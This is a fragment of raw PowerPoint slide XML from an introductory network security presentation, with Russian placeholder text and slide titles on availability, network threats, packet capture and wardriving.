              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Второй уровень</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Третий уровень</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2300" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Четвертый уровень</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пятый уровень</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="PlaceHolder 6" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4646520" y="1719360"/>
            <a:ext cx="4036680" cy="4408200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Образец текста</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Второй уровень</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Третий уровень</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2300" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Четвертый уровень</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пятый уровень</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="PlaceHolder 7" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="dt" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2130120" cy="453600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="-213840">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>14.05.20</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="PlaceHolder 8" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="sldNum" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2130120" cy="453600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="-213840" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{03CA3C7E-897D-4711-A09B-B527EF10F514}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" bg1="lt1" bg2="lt2" folHlink="folHlink" hlink="hlink" tx1="dk1" tx2="dk2"/>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wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.wm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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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jp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g"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.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jp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8.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wmf"/></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1.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2.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3.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jp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wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.wmf"/></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wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.wm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wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.wm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316080" y="466560"/>
            <a:ext cx="6781320" cy="2133360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="b">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4800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="48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52894DA0-0EAC-4F3E-9072-DDE2B92FFD08}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2428920" y="2857680"/>
            <a:ext cx="4571640" cy="342864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Availability</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8457840" cy="4876560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>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u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>- an attacker should not interfere with data transmission</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1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>slide </a:t>
            </a:r>
            <a:fld id="{7B794CDD-2C35-42C3-9539-70C9A1388809}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CustomShape 4" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124080" y="3962519"/>
            <a:ext cx="2666519" cy="1523520"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6787"/>
              <a:gd name="adj2" fmla="val 14898"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCC00"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 5" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1646280" y="4114800"/>
            <a:ext cx="715680" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 6" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6599160" y="4114800"/>
            <a:ext cx="715680" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="CustomShape 5" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="4714920"/>
            <a:ext cx="786960" cy="9000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="496" h="6" fill="norm" stroke="1" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="496" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28440" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 8" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4262400" y="2666880"/>
            <a:ext cx="690120" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="CustomShape 6" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5094360" y="2743200"/>
            <a:ext cx="2744280" cy="825120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>abandons servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>by packages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> hacks it</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>and disrupts their work</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="CustomShape 7" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3479760" y="3733920"/>
            <a:ext cx="786960" cy="1004400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="496" h="633" fill="norm" stroke="1" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="633"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="599"/>
                  <a:pt x="186" y="536"/>
                  <a:pt x="269" y="431"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="352" y="326"/>
                  <a:pt x="449" y="90"/>
                  <a:pt x="496" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28440" cap="sq">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Line 8" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352680" y="4419360"/>
            <a:ext cx="1440" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76320" cap="sq">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>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316080" y="466560"/>
            <a:ext cx="6781320" cy="2319120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="b">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4800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Network Threats</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="48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921A447D-E6D3-4A9B-B80F-5B88B6DF0006}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2214720" y="3286080"/>
            <a:ext cx="4785840" cy="319068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Packet Capture</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1428840"/>
            <a:ext cx="8229240" cy="542880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Wardriving</a:t>
            </a:r>
            <a:r>
